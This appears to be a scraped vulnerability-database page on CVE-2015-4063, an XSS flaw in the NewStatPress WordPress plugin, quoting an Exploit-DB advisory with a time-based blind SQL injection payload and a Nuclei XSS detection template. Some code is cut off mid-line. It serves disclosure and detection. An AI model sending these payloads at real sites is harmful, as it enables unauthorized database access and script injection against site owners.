CVE-2015-4063
published 2015-05-27CVE-2015-4063: Cross-site scripting (XSS) vulnerability in includes/nsp_search.php in the NewStatPress plugin before 0.9.9 for WordPress allows remote authenticated users to…
PriorityP420low3.5CVSS 2.0
AVNACMAuSCNIPAN
EXPLOIT
EPSS
6.19%
92.6th percentile
Cross-site scripting (XSS) vulnerability in includes/nsp_search.php in the NewStatPress plugin before 0.9.9 for WordPress allows remote authenticated users to inject arbitrary web script or HTML via the where1 parameter in the nsp_search page to wp-admin/admin.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| newstatpress_project | newstatpress | <= 0.9.8 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WordPress Plugin NewStatPress 0.9.8 - Multiple Vulnerabilities
exploitdb·2015-05-26·CVSS 6.5
CVE-2015-4063 [MEDIUM] WordPress Plugin NewStatPress 0.9.8 - Multiple Vulnerabilities
WordPress Plugin NewStatPress 0.9.8 - Multiple Vulnerabilities
---
# Title: Multiple vulnerabilities in WordPress plugin "NewStatPress"
# Author: Adrián M. F. - adrimf85[at]gmail[dot]com
# Date: 2015-05-25
# Vendor Homepage: https://wordpress.org/plugins/newstatpress/
# Active installs: 20,000+
# Vulnerable version: 0.9.8
# Fixed version: 0.9.9
# CVE: CVE-2015-4062, CVE-2015-4063
Vulnerabilities (2)
(1) Authenticated SQLi [CWE-89] (CVE-2015-4062)
* CODE:
includes/nsp_search.php:94
+++++++++++++++++++++++++++++++++++++++++
for($i=1;$i= 5.0.12 AND time-based blind (SELECT)
Payload: where1=agent AND (SELECT * FROM (SELECT(SLEEP(5)))Guji)&limitquery=1&searchsubmit=Buscar&page=nsp_search
---
[12:25:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
Nuclei
NewStatPress <0.9.9 - Cross-Site Scripting
nuclei·CVSS 3.5
CVE-2015-4063 [LOW] NewStatPress <0.9.9 - Cross-Site Scripting
NewStatPress alert(document.domain)&searchsubmit=Buscar&page=nsp_search HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- "contains(body_2, 'alert(document.domain)') && contains(body_2, 'newstatpress')"
condition: and
# digest: 490a00463044022062f84751cea0d5cea047ffbd5c36cd472afd5f6e97b9780495584e56a32fdf06022044315b5337f7961b3240719c36d685321b37d3e5dfa83193c3dad702971e8915:922c64590222798bb761d5b6d8e72950
No writeups or analysis indexed.
http://packetstormsecurity.com/files/132038/WordPress-NewStatPress-0.9.8-Cross-Site-Scripting-SQL-Injection.htmlhttp://www.securityfocus.com/bid/74773https://wordpress.org/plugins/newstatpress/changelog/https://www.exploit-db.com/exploits/37107/http://packetstormsecurity.com/files/132038/WordPress-NewStatPress-0.9.8-Cross-Site-Scripting-SQL-Injection.htmlhttp://www.securityfocus.com/bid/74773https://wordpress.org/plugins/newstatpress/changelog/https://www.exploit-db.com/exploits/37107/
2015-05-27
Published